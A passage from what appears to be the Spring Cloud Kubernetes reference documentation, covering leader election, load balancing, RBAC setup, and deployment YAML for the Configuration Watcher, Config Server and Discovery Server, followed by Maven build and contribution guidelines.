Kubernetes ConfigMap.\n\nMultiple application instances compete for leadership, but leadership will only be granted to one.\nWhen granted leadership, a leader application receives an `OnGrantedEvent` application event with leadership `Context`.\nApplications periodically attempt to gain leadership, with leadership granted to the first caller.\nA leader will remain a leader until either it is removed from the cluster, or it yields its leadership.\nWhen leadership removal occurs, the previous leader receives an `OnRevokedEvent` application event.\nAfter removal, any instance in the cluster may become the new leader, including the old leader.\n\nTo include it in your project, add the following dependency:\n\n====\nFabric8 Leader Implementation\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-kubernetes-fabric8-leader<\/artifactId>\n<\/dependency>\n----\n====\n\nTo specify the name of the configmap used for leader election, use the following property:\n\n====\n[source,properties]\n----\nspring.cloud.kubernetes.leader.config-map-name=leader\n----\n====\n\n== LoadBalancer for Kubernetes\nThis project includes Spring Cloud Load Balancer for load balancing based on Kubernetes Endpoints and provides an implementation of a load balancer based on a Kubernetes Service.\nTo include it in your project, add one of the following dependencies:\n\n====\nFabric8 Implementation\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-fabric8-loadbalancer<\/artifactId>\n<\/dependency>\n----\n====\n\n====\nKubernetes Java Client Implementation\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-client-loadbalancer<\/artifactId>\n<\/dependency>\n----\n====\n\nTo enable load balancing based on the Kubernetes Service name, use the following property. The load balancer then tries to call the application by using an address such as `service-a.default.svc.cluster.local`:\n\n====\n[source]\n----\nspring.cloud.kubernetes.loadbalancer.mode=SERVICE\n----\n====\n\nTo enable load balancing across all namespaces, use the following property. The property from the `spring-cloud-kubernetes-discovery` module is respected:\n\n====\n[source]\n----\nspring.cloud.kubernetes.discovery.all-namespaces=true\n----\n====\n\nIf a service needs to be accessed over HTTPS, add a label or annotation named `secured` with the value `true` to your service definition, and the load balancer will then use HTTPS to make requests to the service.\n\n== Security Configurations Inside Kubernetes\n\n\n=== Namespace\n\nMost of the components provided in this project need to know the namespace. For Kubernetes (1.3+), the namespace is made available to the pod as part of the service account secret and is automatically detected by the client.\nFor earlier versions, it needs to be specified as an environment variable to the pod. 
A quick way to do this is as follows:\n\n====\n[source,yaml]\n----\n env:\n - name: \"KUBERNETES_NAMESPACE\"\n valueFrom:\n fieldRef:\n fieldPath: \"metadata.namespace\"\n----\n====\n\n=== Service Account\n\nFor distributions of Kubernetes that support more fine-grained role-based access within the cluster, you need to make sure a pod that runs with `spring-cloud-kubernetes` has access to the Kubernetes API.\nFor any service accounts you assign to a deployment or pod, you need to make sure they have the correct roles.\n\nDepending on the requirements, you'll need `get`, `list` and `watch` permissions on the following resources:\n\n.Kubernetes Resource Permissions\n|===\n|Dependency | Resources\n\n\n|spring-cloud-starter-kubernetes-fabric8\n|pods, services, endpoints\n\n|spring-cloud-starter-kubernetes-fabric8-config\n|configmaps, secrets\n\n|spring-cloud-starter-kubernetes-client\n|pods, services, endpoints\n\n|spring-cloud-starter-kubernetes-client-config\n|configmaps, secrets\n|===\n\nFor development purposes, you can add `cluster-reader` permissions to your `default` service account. On a production system you'll likely want to provide more granular permissions.\n\nThe following Role and RoleBinding are an example of namespaced permissions for the `default` account:\n\n====\n[source,yaml]\n----\nkind: Role\napiVersion: rbac.authorization.k8s.io\/v1\nmetadata:\n namespace: YOUR-NAME-SPACE\n name: namespace-reader\nrules:\n - apiGroups: [\"\"]\n resources: [\"configmaps\", \"pods\", \"services\", \"endpoints\", \"secrets\"]\n verbs: [\"get\", \"list\", \"watch\"]\n\n---\n\nkind: RoleBinding\napiVersion: rbac.authorization.k8s.io\/v1\nmetadata:\n name: namespace-reader-binding\n namespace: YOUR-NAME-SPACE\nsubjects:\n- kind: ServiceAccount\n name: default\n apiGroup: \"\"\nroleRef:\n kind: Role\n name: namespace-reader\n apiGroup: \"\"\n----\n====\n\n== Service Registry Implementation\n\nIn Kubernetes, service registration is controlled by the platform; the application itself does not control\nregistration as it may in other platforms. For this reason, using `spring.cloud.service-registry.auto-registration.enabled`\nor setting `@EnableDiscoveryClient(autoRegister=false)` will have no effect in Spring Cloud Kubernetes.\n\n[#spring-cloud-kubernetes-configuration-watcher]\n## Spring Cloud Kubernetes Configuration Watcher\n\nKubernetes provides the ability to https:\/\/kubernetes.io\/docs\/tasks\/configure-pod-container\/configure-pod-configmap\/#add-configmap-data-to-a-volume[mount a ConfigMap or Secret as a volume]\nin the container of your application. When the contents of the ConfigMap or Secret change, the https:\/\/kubernetes.io\/docs\/tasks\/configure-pod-container\/configure-pod-configmap\/#mounted-configmaps-are-updated-automatically[mounted volume will be updated with those changes].\n\nHowever, Spring Boot will not automatically update those changes unless you restart the application. 
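As a sketch of such a mount (the names here are illustrative, not taken from this project):\n\n====\n[source,yaml]\n----\nspec:\n  containers:\n    - name: app\n      volumeMounts:\n        # each key of the ConfigMap appears as a file under this path\n        - name: config\n          mountPath: \/etc\/config\n  volumes:\n    - name: config\n      configMap:\n        name: app-config\n----\n====\n\n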
Spring Cloud\nprovides the ability to refresh the application context without restarting the application by either hitting the\nactuator endpoint `\/refresh` or by publishing a `RefreshRemoteApplicationEvent` using Spring Cloud Bus.\n\nTo achieve this configuration refresh of a Spring Cloud app running on Kubernetes, you can deploy the Spring Cloud\nKubernetes Configuration Watcher controller into your Kubernetes cluster.\n\nThe application is published as a container and is available on https:\/\/hub.docker.com\/r\/springcloud\/spring-cloud-kubernetes-configuration-watcher[Docker Hub].\n\nSpring Cloud Kubernetes Configuration Watcher can send refresh notifications to applications in two ways:\n\n1. Over HTTP, in which case the application being notified must have the `\/refresh` actuator endpoint exposed and accessible from within the cluster\n2. Using Spring Cloud Bus, in which case you will need a message broker deployed to your cluster for the application to use.\n\n### Deployment YAML\n\nBelow is a sample deployment YAML you can use to deploy the Kubernetes Configuration Watcher to Kubernetes.\n\n====\n[source,yaml]\n----\n---\napiVersion: v1\nkind: List\nitems:\n - apiVersion: v1\n kind: Service\n metadata:\n labels:\n app: spring-cloud-kubernetes-configuration-watcher\n name: spring-cloud-kubernetes-configuration-watcher\n spec:\n ports:\n - name: http\n port: 8888\n targetPort: 8888\n selector:\n app: spring-cloud-kubernetes-configuration-watcher\n type: ClusterIP\n - apiVersion: v1\n kind: ServiceAccount\n metadata:\n labels:\n app: spring-cloud-kubernetes-configuration-watcher\n name: spring-cloud-kubernetes-configuration-watcher\n - apiVersion: rbac.authorization.k8s.io\/v1\n kind: RoleBinding\n metadata:\n labels:\n app: spring-cloud-kubernetes-configuration-watcher\n name: spring-cloud-kubernetes-configuration-watcher:view\n roleRef:\n kind: Role\n apiGroup: rbac.authorization.k8s.io\n name: namespace-reader\n subjects:\n - kind: ServiceAccount\n name: spring-cloud-kubernetes-configuration-watcher\n - apiVersion: rbac.authorization.k8s.io\/v1\n kind: Role\n metadata:\n namespace: default\n name: namespace-reader\n rules:\n - apiGroups: [\"\", \"extensions\", \"apps\"]\n resources: [\"configmaps\", \"pods\", \"services\", \"endpoints\", \"secrets\"]\n verbs: [\"get\", \"list\", \"watch\"]\n - apiVersion: apps\/v1\n kind: Deployment\n metadata:\n name: spring-cloud-kubernetes-configuration-watcher-deployment\n spec:\n selector:\n matchLabels:\n app: spring-cloud-kubernetes-configuration-watcher\n template:\n metadata:\n labels:\n app: spring-cloud-kubernetes-configuration-watcher\n spec:\n serviceAccount: spring-cloud-kubernetes-configuration-watcher\n containers:\n - name: spring-cloud-kubernetes-configuration-watcher\n image: springcloud\/spring-cloud-kubernetes-configuration-watcher:2.0.1-SNAPSHOT\n imagePullPolicy: IfNotPresent\n readinessProbe:\n httpGet:\n port: 8888\n path: \/actuator\/health\/readiness\n livenessProbe:\n httpGet:\n port: 8888\n path: \/actuator\/health\/liveness\n ports:\n - containerPort: 8888\n\n----\n====\n\nThe Service Account and associated Role Binding are important for Spring Cloud Kubernetes Configuration Watcher to work properly.\nThe controller needs access to read data about ConfigMaps, Pods, Services, Endpoints and Secrets in the Kubernetes cluster.\n\n### Monitoring ConfigMaps and Secrets\n\nSpring Cloud Kubernetes Configuration Watcher will react to changes in ConfigMaps with a label of `spring.cloud.kubernetes.config` with the value `true`\nor any Secret 
with a label of `spring.cloud.kubernetes.secret` with the value `true`. If the ConfigMap or Secret does not have either of those labels,\nor the values of those labels are not `true`, then any changes will be ignored.\n\nThe labels Spring Cloud Kubernetes Configuration Watcher looks for on ConfigMaps and Secrets can be changed by setting\n`spring.cloud.kubernetes.configuration.watcher.configLabel` and `spring.cloud.kubernetes.configuration.watcher.secretLabel` respectively.\n\nIf a change is made to a ConfigMap or Secret with valid labels, then Spring Cloud Kubernetes Configuration Watcher takes the name of the ConfigMap or Secret\nand sends a notification to the application with that name.\n\n### HTTP Implementation\n\nThe HTTP implementation is used by default. When this implementation is used and a change to a ConfigMap or Secret occurs,\nSpring Cloud Kubernetes Configuration Watcher uses the Spring Cloud Kubernetes Discovery Client to fetch all\ninstances of the application which match the name of the ConfigMap or Secret and sends an HTTP POST request to the application's actuator\n`\/refresh` endpoint. By default, it sends the POST request to `\/actuator\/refresh` using the port registered in the discovery client.\n\n#### Non-Default Management Port and Actuator Path\n\nIf the application is using a non-default actuator path and\/or using a different port for the management endpoints, the Kubernetes service for the application\ncan add an annotation called `boot.spring.io\/actuator` and set its value to the path and port used by the application. For example:\n\n====\n[source,yaml]\n----\napiVersion: v1\nkind: Service\nmetadata:\n labels:\n app: config-map-demo\n name: config-map-demo\n annotations:\n boot.spring.io\/actuator: http:\/\/:9090\/myactuator\/home\nspec:\n ports:\n - name: http\n port: 8080\n targetPort: 8080\n selector:\n app: config-map-demo\n----\n====\n\n\nAnother way you can choose to configure the actuator path and\/or management port is by setting\n`spring.cloud.kubernetes.configuration.watcher.actuatorPath` and `spring.cloud.kubernetes.configuration.watcher.actuatorPort`.\n\n### Messaging Implementation\n\nThe messaging implementation can be enabled by setting the profile to either `bus-amqp` (RabbitMQ) or `bus-kafka` (Kafka) when the Spring Cloud Kubernetes Configuration Watcher\napplication is deployed to Kubernetes.\n\n### Configuring RabbitMQ\n\nWhen the `bus-amqp` profile is enabled, you will need to configure Spring RabbitMQ to point it to the location of the RabbitMQ\ninstance you would like to use, as well as any credentials necessary to authenticate. This can be done\nby setting the standard Spring RabbitMQ properties, for example:\n\n====\n[source,yaml]\n----\nspring:\n rabbitmq:\n username: user\n password: password\n host: rabbitmq\n----\n====\n\n### Configuring Kafka\n\nWhen the `bus-kafka` profile is enabled, you will need to configure Spring Kafka to point it to the location of the Kafka Broker\ninstance you would like to use. 
This can be done by setting the standard Spring Kafka properties, for example:\n\n====\n[source,yaml]\n----\nspring:\n kafka:\n producer:\n bootstrap-servers: localhost:9092\n----\n====\n\n[#spring-cloud-kubernetes-configserver]\n## Spring Cloud Kubernetes Config Server\n\nThe Spring Cloud Kubernetes Config Server is based on https:\/\/spring.io\/projects\/spring-cloud-config[Spring Cloud Config Server] and adds an https:\/\/docs.spring.io\/spring-cloud-config\/docs\/current\/reference\/html\/#_environment_repository[environment repository] for Kubernetes\nhttps:\/\/kubernetes.io\/docs\/concepts\/configuration\/configmap\/[Config Maps] and https:\/\/kubernetes.io\/docs\/concepts\/configuration\/secret\/[Secrets].\n\nThis component is completely optional. However, it allows you to continue to leverage configuration\nyou may have stored in existing environment repositories (Git, SVN, Vault, etc.) with applications that you are running on Kubernetes.\n\nA default image is located on https:\/\/hub.docker.com\/r\/springcloud\/spring-cloud-kubernetes-configserver[Docker Hub], which allows you to easily get a Config Server deployed on Kubernetes without building\nthe code and image yourself. However, if you need to customize the config server behavior, you can easily build your own\nimage from the source code on GitHub and use that.\n\n### Configuration\n\n#### Enabling The Kubernetes Environment Repository\nTo enable the Kubernetes environment repository, the `kubernetes` profile must be included in the list of active profiles.\nYou may activate other profiles as well to use other environment repository implementations.\n\n#### Config Map and Secret PropertySources\nBy default, only Config Map data will be fetched. To enable Secrets as well, you will need to set `spring.cloud.kubernetes.secrets.enableApi=true`.\nYou can disable the Config Map `PropertySource` by setting `spring.cloud.kubernetes.config.enableApi=false`.\n\n#### Fetching Config Map and Secret Data From Additional Namespaces\nBy default, the Kubernetes environment repository will only fetch Config Maps and Secrets from the namespace in which it is deployed.\nIf you want to include data from other namespaces, you can set `spring.cloud.kubernetes.configserver.config-map-namespaces` and\/or `spring.cloud.kubernetes.configserver.secrets-namespaces` to a comma-separated\nlist of namespace values.\n\nNOTE: If you set `spring.cloud.kubernetes.configserver.config-map-namespaces` and\/or `spring.cloud.kubernetes.configserver.secrets-namespaces`\nyou will need to include the namespace in which the Config Server is deployed in order to continue to fetch Config Map and Secret data from that namespace.\n\n#### Kubernetes Access Controls\nThe Kubernetes Config Server uses the Kubernetes API server to fetch Config Map and Secret data. 
In order to do that,\nit needs the ability to `get` and `list` Config Maps and Secrets (depending on what you enable\/disable).\n\n### Deployment YAML\n\nBelow is a sample deployment, service and permissions configuration you can use to deploy a basic Config Server to Kubernetes.\n\n====\n[source,yaml]\n----\n---\napiVersion: v1\nkind: List\nitems:\n - apiVersion: v1\n kind: Service\n metadata:\n labels:\n app: spring-cloud-kubernetes-configserver\n name: spring-cloud-kubernetes-configserver\n spec:\n ports:\n - name: http\n port: 8888\n targetPort: 8888\n selector:\n app: spring-cloud-kubernetes-configserver\n type: ClusterIP\n - apiVersion: v1\n kind: ServiceAccount\n metadata:\n labels:\n app: spring-cloud-kubernetes-configserver\n name: spring-cloud-kubernetes-configserver\n - apiVersion: rbac.authorization.k8s.io\/v1\n kind: RoleBinding\n metadata:\n labels:\n app: spring-cloud-kubernetes-configserver\n name: spring-cloud-kubernetes-configserver:view\n roleRef:\n kind: Role\n apiGroup: rbac.authorization.k8s.io\n name: namespace-reader\n subjects:\n - kind: ServiceAccount\n name: spring-cloud-kubernetes-configserver\n - apiVersion: rbac.authorization.k8s.io\/v1\n kind: Role\n metadata:\n namespace: default\n name: namespace-reader\n rules:\n - apiGroups: [\"\", \"extensions\", \"apps\"]\n resources: [\"configmaps\", \"secrets\"]\n verbs: [\"get\", \"list\"]\n - apiVersion: apps\/v1\n kind: Deployment\n metadata:\n name: spring-cloud-kubernetes-configserver-deployment\n spec:\n selector:\n matchLabels:\n app: spring-cloud-kubernetes-configserver\n template:\n metadata:\n labels:\n app: spring-cloud-kubernetes-configserver\n spec:\n serviceAccount: spring-cloud-kubernetes-configserver\n containers:\n - name: spring-cloud-kubernetes-configserver\n image: springcloud\/spring-cloud-kubernetes-configserver\n imagePullPolicy: IfNotPresent\n env:\n - name: SPRING_PROFILES_INCLUDE\n value: \"kubernetes\"\n readinessProbe:\n httpGet:\n port: 8888\n path: \/actuator\/health\/readiness\n livenessProbe:\n httpGet:\n port: 8888\n path: \/actuator\/health\/liveness\n ports:\n - containerPort: 8888\n\n----\n====\n\n[#spring-cloud-kubernetes-discoveryserver]\n## Spring Cloud Kubernetes Discovery Server\n\nThe Spring Cloud Kubernetes Discovery Server provides HTTP endpoints apps can use to gather information\nabout services available within a Kubernetes cluster. The Spring Cloud Kubernetes Discovery Server\ncan be used by apps using the `spring-cloud-starter-kubernetes-discoveryclient` to provide data to\nthe `DiscoveryClient` implementation provided by that starter.\n\n### Permissions\nThe Spring Cloud Discovery server uses\nthe Kubernetes API server to get data about Service and Endpoint resources, so it needs `list`, `watch`, and\n`get` permissions to use those endpoints. See the below sample Kubernetes deployment YAML for an\nexample of how to configure the Service Account on Kubernetes.\n\n\n### Endpoints\nThere are three endpoints exposed by the server.\n\n#### `\/apps`\n\nA `GET` request sent to `\/apps` will return a JSON array of available services. Each item contains\nthe name of the Kubernetes service and service instance information. 
Below is a sample response.\n\n====\n[source,json]\n----\n[\n {\n \"name\":\"spring-cloud-kubernetes-discoveryserver\",\n \"serviceInstances\":[\n {\n \"instanceId\":\"836a2f25-daee-4af2-a1be-aab9ce2b938f\",\n \"serviceId\":\"spring-cloud-kubernetes-discoveryserver\",\n \"host\":\"10.244.1.6\",\n \"port\":8761,\n \"uri\":\"http:\/\/10.244.1.6:8761\",\n \"secure\":false,\n \"metadata\":{\n \"app\":\"spring-cloud-kubernetes-discoveryserver\",\n \"kubectl.kubernetes.io\/last-applied-configuration\":\"{\\\"apiVersion\\\":\\\"v1\\\",\\\"kind\\\":\\\"Service\\\",\\\"metadata\\\":{\\\"annotations\\\":{},\\\"labels\\\":{\\\"app\\\":\\\"spring-cloud-kubernetes-discoveryserver\\\"},\\\"name\\\":\\\"spring-cloud-kubernetes-discoveryserver\\\",\\\"namespace\\\":\\\"default\\\"},\\\"spec\\\":{\\\"ports\\\":[{\\\"name\\\":\\\"http\\\",\\\"port\\\":80,\\\"targetPort\\\":8761}],\\\"selector\\\":{\\\"app\\\":\\\"spring-cloud-kubernetes-discoveryserver\\\"},\\\"type\\\":\\\"ClusterIP\\\"}}\\n\",\n \"http\":\"8761\"\n },\n \"namespace\":\"default\",\n \"scheme\":\"http\"\n }\n ]\n },\n {\n \"name\":\"kubernetes\",\n \"serviceInstances\":[\n {\n \"instanceId\":\"1234\",\n \"serviceId\":\"kubernetes\",\n \"host\":\"172.18.0.3\",\n \"port\":6443,\n \"uri\":\"http:\/\/172.18.0.3:6443\",\n \"secure\":false,\n \"metadata\":{\n \"provider\":\"kubernetes\",\n \"component\":\"apiserver\",\n \"https\":\"6443\"\n },\n \"namespace\":\"default\",\n \"scheme\":\"http\"\n }\n ]\n }\n]\n----\n====\n\n#### `\/app\/{name}`\n\nA `GET` request to `\/app\/{name}` can be used to get instance data for all instances of a given\nservice. Below is a sample response when a `GET` request is made to `\/app\/kubernetes`.\n\n====\n[source,json]\n----\n[\n {\n \"instanceId\":\"1234\",\n \"serviceId\":\"kubernetes\",\n \"host\":\"172.18.0.3\",\n \"port\":6443,\n \"uri\":\"http:\/\/172.18.0.3:6443\",\n \"secure\":false,\n \"metadata\":{\n \"provider\":\"kubernetes\",\n \"component\":\"apiserver\",\n \"https\":\"6443\"\n },\n \"namespace\":\"default\",\n \"scheme\":\"http\"\n }\n]\n----\n====\n\n#### `\/app\/{name}\/{instanceid}`\n\nA `GET` request made to `\/app\/{name}\/{instanceid}` will return the instance data for a specific\ninstance of a given service. 
Below is a sample response when a `GET` request is made to `\/app\/kubernetes\/1234`.\n\n====\n[source,json]\n----\n {\n \"instanceId\":\"1234\",\n \"serviceId\":\"kubernetes\",\n \"host\":\"172.18.0.3\",\n \"port\":6443,\n \"uri\":\"http:\/\/172.18.0.3:6443\",\n \"secure\":false,\n \"metadata\":{\n \"provider\":\"kubernetes\",\n \"component\":\"apiserver\",\n \"https\":\"6443\"\n },\n \"namespace\":\"default\",\n \"scheme\":\"http\"\n }\n----\n====\n\n### Deployment YAML\n\nAn image of the Spring Cloud Discovery Server is hosted on https:\/\/hub.docker.com\/r\/springcloud\/spring-cloud-kubernetes-discoveryserver[Docker Hub].\n\nBelow is a sample deployment YAML you can use to deploy the Spring Cloud Kubernetes Discovery Server to Kubernetes.\n\n====\n[source,yaml]\n----\n---\napiVersion: v1\nkind: List\nitems:\n - apiVersion: v1\n kind: Service\n metadata:\n labels:\n app: spring-cloud-kubernetes-discoveryserver\n name: spring-cloud-kubernetes-discoveryserver\n spec:\n ports:\n - name: http\n port: 80\n targetPort: 8761\n selector:\n app: spring-cloud-kubernetes-discoveryserver\n type: ClusterIP\n - apiVersion: v1\n kind: ServiceAccount\n metadata:\n labels:\n app: spring-cloud-kubernetes-discoveryserver\n name: spring-cloud-kubernetes-discoveryserver\n - apiVersion: rbac.authorization.k8s.io\/v1\n kind: RoleBinding\n metadata:\n labels:\n app: spring-cloud-kubernetes-discoveryserver\n name: spring-cloud-kubernetes-discoveryserver:view\n roleRef:\n kind: Role\n apiGroup: rbac.authorization.k8s.io\n name: namespace-reader\n subjects:\n - kind: ServiceAccount\n name: spring-cloud-kubernetes-discoveryserver\n - apiVersion: rbac.authorization.k8s.io\/v1\n kind: Role\n metadata:\n namespace: default\n name: namespace-reader\n rules:\n - apiGroups: [\"\", \"extensions\", \"apps\"]\n resources: [\"services\", \"endpoints\"]\n verbs: [\"get\", \"list\", \"watch\"]\n - apiVersion: apps\/v1\n kind: Deployment\n metadata:\n name: spring-cloud-kubernetes-discoveryserver-deployment\n spec:\n selector:\n matchLabels:\n app: spring-cloud-kubernetes-discoveryserver\n template:\n metadata:\n labels:\n app: spring-cloud-kubernetes-discoveryserver\n spec:\n serviceAccount: spring-cloud-kubernetes-discoveryserver\n containers:\n - name: spring-cloud-kubernetes-discoveryserver\n image: springcloud\/spring-cloud-kubernetes-discoveryserver:3.0.0-SNAPSHOT\n imagePullPolicy: IfNotPresent\n readinessProbe:\n httpGet:\n port: 8761\n path: \/actuator\/health\/readiness\n livenessProbe:\n httpGet:\n port: 8761\n path: \/actuator\/health\/liveness\n ports:\n - containerPort: 8761\n\n\n----\n====\n\n== Examples\n\nSpring Cloud Kubernetes tries to make it transparent for your applications to consume Kubernetes Native Services by\nfollowing the Spring Cloud interfaces.\n\nIn your applications, you need to add the `spring-cloud-kubernetes-discovery` dependency to your classpath and remove any other dependency that contains a `DiscoveryClient` implementation (for example, a Eureka discovery client).\nThe same applies for `PropertySourceLocator`, where you need to add `spring-cloud-kubernetes-config` to the classpath and remove any other dependency that contains a `PropertySourceLocator` implementation (for example, a configuration server client).\n\nThe following projects highlight the usage of these dependencies and demonstrate how you can use these libraries from any Spring Boot application:\n\n* https:\/\/github.com\/spring-cloud\/spring-cloud-kubernetes\/tree\/master\/spring-cloud-kubernetes-examples[Spring Cloud Kubernetes 
Examples]: the ones located inside this repository.\n* Spring Cloud Kubernetes Full Example: Minions and Boss\n\t** https:\/\/github.com\/salaboy\/spring-cloud-k8s-minion[Minion]\n\t** https:\/\/github.com\/salaboy\/spring-cloud-k8s-boss[Boss]\n* Spring Cloud Kubernetes Full Example: https:\/\/github.com\/salaboy\/s1p_docs[SpringOne Platform Tickets Service]\n* https:\/\/github.com\/salaboy\/s1p_gateway[Spring Cloud Gateway with Spring Cloud Kubernetes Discovery and Config]\n* https:\/\/github.com\/salaboy\/showcase-admin-tool[Spring Boot Admin with Spring Cloud Kubernetes Discovery and Config]\n\n== Other Resources\n\nThis section lists other resources, such as presentations (slides) and videos about Spring Cloud Kubernetes.\n\n* https:\/\/salaboy.com\/2018\/09\/27\/the-s1p-experience\/[S1P Spring Cloud on PKS]\n* https:\/\/salaboy.com\/2018\/07\/18\/ljc-july-18-spring-cloud-docker-k8s\/[Spring Cloud, Docker, Kubernetes -> London Java Community July 2018]\n\n\nPlease feel free to submit other resources through pull requests to https:\/\/github.com\/spring-cloud\/spring-cloud-kubernetes[this repository].\n\n== Configuration properties\n\nTo see the list of all Kubernetes-related configuration properties, please check link:appendix.html[the Appendix page].\n\n== Building\n\n:jdkversion: 1.8\n\n=== Basic Compile and Test\n\nTo build the source you will need to install JDK {jdkversion}.\n\nSpring Cloud uses Maven for most build-related activities, and you\nshould be able to get off the ground quite quickly by cloning the\nproject you are interested in and typing:\n\n----\n$ .\/mvnw install\n----\n\nNOTE: You can also install Maven (>=3.3.3) yourself and run the `mvn` command\nin place of `.\/mvnw` in the examples below. If you do that, you also\nmight need to add `-P spring` if your local Maven settings do not\ncontain repository declarations for spring pre-release artifacts.\n\nNOTE: Be aware that you might need to increase the amount of memory\navailable to Maven by setting a `MAVEN_OPTS` environment variable with\na value like `-Xmx512m -XX:MaxPermSize=128m`. We try to cover this in\nthe `.mvn` configuration, so if you find you have to do it to make a\nbuild succeed, please raise a ticket to get the settings added to\nsource control.\n\nThe projects that require middleware (e.g. Redis) for testing generally\nrequire that a local instance of https:\/\/www.docker.com\/get-started[Docker] is installed and running.\n\n\n=== Documentation\n\nThe spring-cloud-build module has a \"docs\" profile, and if you switch\nthat on, it will try to build asciidoc sources from\n`src\/main\/asciidoc`. As part of that process, it will look for a\n`README.adoc` and process it by loading all the includes, but not\nparsing or rendering it, just copying it to `${main.basedir}`\n(defaults to `${basedir}`, i.e. the root of the project). If there are\nany changes in the README, it will then show up after a Maven build as\na modified file in the correct place. Just commit it and push the change.\n\n=== Working with the code\nIf you don't have an IDE preference, we would recommend that you use\nhttps:\/\/www.springsource.com\/developer\/sts[Spring Tools Suite] or\nhttps:\/\/eclipse.org[Eclipse] when working with the code. We use the\nhttps:\/\/eclipse.org\/m2e\/[m2eclipse] eclipse plugin for maven support. 
Other IDEs and tools\nshould also work without issue as long as they use Maven 3.3.3 or better.\n\n==== Activate the Spring Maven profile\nSpring Cloud projects require the 'spring' Maven profile to be activated to resolve\nthe spring milestone and snapshot repositories. Use your preferred IDE to set this\nprofile to be active, or you may experience build errors.\n\n==== Importing into eclipse with m2eclipse\nWe recommend the https:\/\/eclipse.org\/m2e\/[m2eclipse] eclipse plugin when working with\neclipse. If you don't already have m2eclipse installed it is available from the \"eclipse\nmarketplace\".\n\nNOTE: Older versions of m2e do not support Maven 3.3, so once the\nprojects are imported into Eclipse you will also need to tell\nm2eclipse to use the right profile for the projects. If you\nsee many different errors related to the POMs in the projects, check\nthat you have an up to date installation. If you can't upgrade m2e,\nadd the \"spring\" profile to your `settings.xml`. Alternatively you can\ncopy the repository settings from the \"spring\" profile of the parent\npom into your `settings.xml`.\n\n==== Importing into eclipse without m2eclipse\nIf you prefer not to use m2eclipse you can generate eclipse project metadata using the\nfollowing command:\n\n[indent=0]\n----\n\t$ .\/mvnw eclipse:eclipse\n----\n\nThe generated eclipse projects can be imported by selecting `import existing projects`\nfrom the `file` menu.\n\n\n== Contributing\n\n:spring-cloud-build-branch: master\n\nSpring Cloud is released under the non-restrictive Apache 2.0 license,\nand follows a very standard Github development process, using Github\ntracker for issues and merging pull requests into master. If you want\nto contribute even something trivial please do not hesitate, but\nfollow the guidelines below.\n\n=== Sign the Contributor License Agreement\nBefore we accept a non-trivial patch or pull request we will need you to sign the\nhttps:\/\/cla.pivotal.io\/sign\/spring[Contributor License Agreement].\nSigning the contributor's agreement does not grant anyone commit rights to the main\nrepository, but it does mean that we can accept your contributions, and you will get an\nauthor credit if we do. Active contributors might be asked to join the core team, and\ngiven the ability to merge pull requests.\n\n=== Code of Conduct\nThis project adheres to the Contributor Covenant https:\/\/github.com\/spring-cloud\/spring-cloud-build\/blob\/master\/docs\/src\/main\/asciidoc\/code-of-conduct.adoc[code of\nconduct]. By participating, you are expected to uphold this code. Please report\nunacceptable behavior to spring-code-of-conduct@pivotal.io.\n\n=== Code Conventions and Housekeeping\nNone of these is essential for a pull request, but they will all help. They can also be\nadded after the original pull request but before a merge.\n\n* Use the Spring Framework code format conventions. If you use Eclipse\n you can import formatter settings using the\n `eclipse-code-formatter.xml` file from the\n https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/master\/spring-cloud-dependencies-parent\/eclipse-code-formatter.xml[Spring\n Cloud Build] project. 
If using IntelliJ, you can use the\n https:\/\/plugins.jetbrains.com\/plugin\/6546[Eclipse Code Formatter\n Plugin] to import the same file.\n* Make sure all new `.java` files have a simple Javadoc class comment with at least an\n `@author` tag identifying you, and preferably at least a paragraph on what the class is\n for.\n* Add the ASF license header comment to all new `.java` files (copy from existing files\n in the project).\n* Add yourself as an `@author` to the .java files that you modify substantially (more\n than cosmetic changes).\n* Add some Javadocs and, if you change the namespace, some XSD doc elements.\n* A few unit tests would help a lot as well -- someone has to do it.\n* If no-one else is using your branch, please rebase it against the current master (or\n other target branch in the main project).\n* When writing a commit message, please follow https:\/\/tbaggery.com\/2008\/04\/19\/a-note-about-git-commit-messages.html[these conventions];\n if you are fixing an existing issue, please add `Fixes gh-XXXX` at the end of the commit\n message (where XXXX is the issue number).\n\n=== Checkstyle\n\nSpring Cloud Build comes with a set of checkstyle rules. You can find them in the `spring-cloud-build-tools` module. The most notable files under the module are:\n\n.spring-cloud-build-tools\/\n----\n\u2514\u2500\u2500 src\n \u00a0\u00a0 \u251c\u2500\u2500 checkstyle\n \u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 checkstyle-suppressions.xml <3>\n \u00a0\u00a0 \u2514\u2500\u2500 main\n \u00a0\u00a0 \u2514\u2500\u2500 resources\n \u00a0\u00a0 \u251c\u2500\u2500 checkstyle-header.txt <2>\n \u00a0\u00a0 \u2514\u2500\u2500 checkstyle.xml <1>\n----\n<1> Default Checkstyle rules\n<2> File header setup\n<3> Default suppression rules\n\n==== Checkstyle configuration\n\nCheckstyle rules are *disabled by default*. To add checkstyle to your project, just define the following properties and plugins.\n\n.pom.xml\n----\n<properties>\n<maven-checkstyle-plugin.failsOnError>true<\/maven-checkstyle-plugin.failsOnError> <1>\n <maven-checkstyle-plugin.failsOnViolation>true\n <\/maven-checkstyle-plugin.failsOnViolation> <2>\n <maven-checkstyle-plugin.includeTestSourceDirectory>true\n <\/maven-checkstyle-plugin.includeTestSourceDirectory> <3>\n<\/properties>\n\n<build>\n <plugins>\n <plugin> <4>\n <groupId>io.spring.javaformat<\/groupId>\n <artifactId>spring-javaformat-maven-plugin<\/artifactId>\n <\/plugin>\n <plugin> <5>\n <groupId>org.apache.maven.plugins<\/groupId>\n <artifactId>maven-checkstyle-plugin<\/artifactId>\n <\/plugin>\n <\/plugins>\n\n <reporting>\n <plugins>\n <plugin> <5>\n <groupId>org.apache.maven.plugins<\/groupId>\n <artifactId>maven-checkstyle-plugin<\/artifactId>\n <\/plugin>\n <\/plugins>\n <\/reporting>\n<\/build>\n----\n<1> Fails the build upon Checkstyle errors\n<2> Fails the build upon Checkstyle violations\n<3> Checkstyle also analyzes the test sources\n<4> Add the Spring Java Format plugin that will reformat your code to pass most of the Checkstyle formatting rules\n<5> Add the checkstyle plugin to your build and reporting phases\n\nIf you need to suppress some rules (e.g. line length needs to 